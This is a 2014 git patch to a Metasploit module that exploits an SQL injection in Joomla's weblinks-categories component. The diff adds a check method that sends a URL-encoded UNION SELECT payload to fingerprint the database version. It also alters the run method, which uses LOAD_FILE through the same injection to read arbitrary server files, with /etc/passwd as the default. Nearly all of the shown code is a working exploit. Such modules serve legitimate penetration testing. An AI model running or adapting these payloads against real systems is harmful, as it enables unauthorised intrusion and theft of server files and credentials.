From aa00a5d550c5f9d67c33bb7d73cd877d08217d45 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Wed, 12 Mar 2014 19:47:39 -0500
Subject: [PATCH] check method

---
 .../auxiliary/gather/joomla_weblinks_sqli.rb  | 39 +++++++++++++++++--
 1 file changed, 36 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/gather/joomla_weblinks_sqli.rb b/modules/auxiliary/gather/joomla_weblinks_sqli.rb
index b07966ccf7..96f953a448 100644
--- a/modules/auxiliary/gather/joomla_weblinks_sqli.rb
+++ b/modules/auxiliary/gather/joomla_weblinks_sqli.rb
@@ -1,5 +1,5 @@
-##
 # This module requires Metasploit: http//metasploit.com/download
+##
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -26,6 +26,7 @@ class Metasploit3 < Msf::Auxiliary
         ],
       'References'     =>
         [
+          ['EDB', '31459']
         ],
       'DisclosureDate' => 'Mar 2 2014'
     ))
@@ -33,16 +34,44 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         OptString.new('TARGETURI', [ true, "Base Joomla directory path", '/joomla']),
-        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"])
+        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
+        OptInt.new('CATEGORYID', [true, "The category ID to use in the SQL injection", 0])
       ], self.class)
 
   end
 
+  def check
+    payload = datastore['CATEGORYID'].to_s
+    payload << "0%29%20UNION%20ALL%20SELECT%20CONCAT%280x71636f7471%2CIFNULL%28CAST%28VERSION%28%29%20"
+    payload << "AS%20CHAR%29%2C0x20%29%2C0x7165776271%29%23"
+
+    resp = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/index.php/weblinks-categories?id=' + payload)
+    })
+
+    if !resp or !resp.body
+      return Exploit::CheckCode::Safe
+    end
+
+    version = /qcotq(.*)qewbq/.match(resp.body)
+
+    if !version
+      return Exploit::CheckCode::Safe
+    end
+
+    version = version[1].gsub('qcotq', '').gsub('qewbq', '')
+    print_good("Fingerprinted: #{version}")
+    return Exploit::CheckCode::Vulnerable
+  end
 
   def run
     file = datastore['FILEPATH'].unpack("H*")[0]
-    payload = "32%29%20UNION%20ALL%20SELECT%20CONCAT%280x7163756871%2CIFNULL%28CAST%28HEX%28LOAD_FILE%28"
+    catid = datastore['CATEGORYID']
+
+    payload = catid.to_s 
+    payload << "%29%20UNION%20ALL%20SELECT%20CONCAT%280x7163756871%2CIFNULL%28CAST%28HEX%28LOAD_FILE%28"
     payload << "0x#{file}%29%29%20AS%20CHAR%29%2C0x20%29%2C0x716f687671%29%23"
+
     resp = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/index.php/weblinks-categories?id=' + payload)
     })
@@ -53,6 +82,10 @@ class Metasploit3 < Msf::Auxiliary
 
     file = /qcuhq(.*)qohvq/.match(resp.body)
 
+    if !file
+      fail_with("Either the file didn't exist or the server has been patched.")
+    end
+
     file = file[1].gsub('qcuhq', '').gsub('qohvq', '')
     file = [file].pack("H*")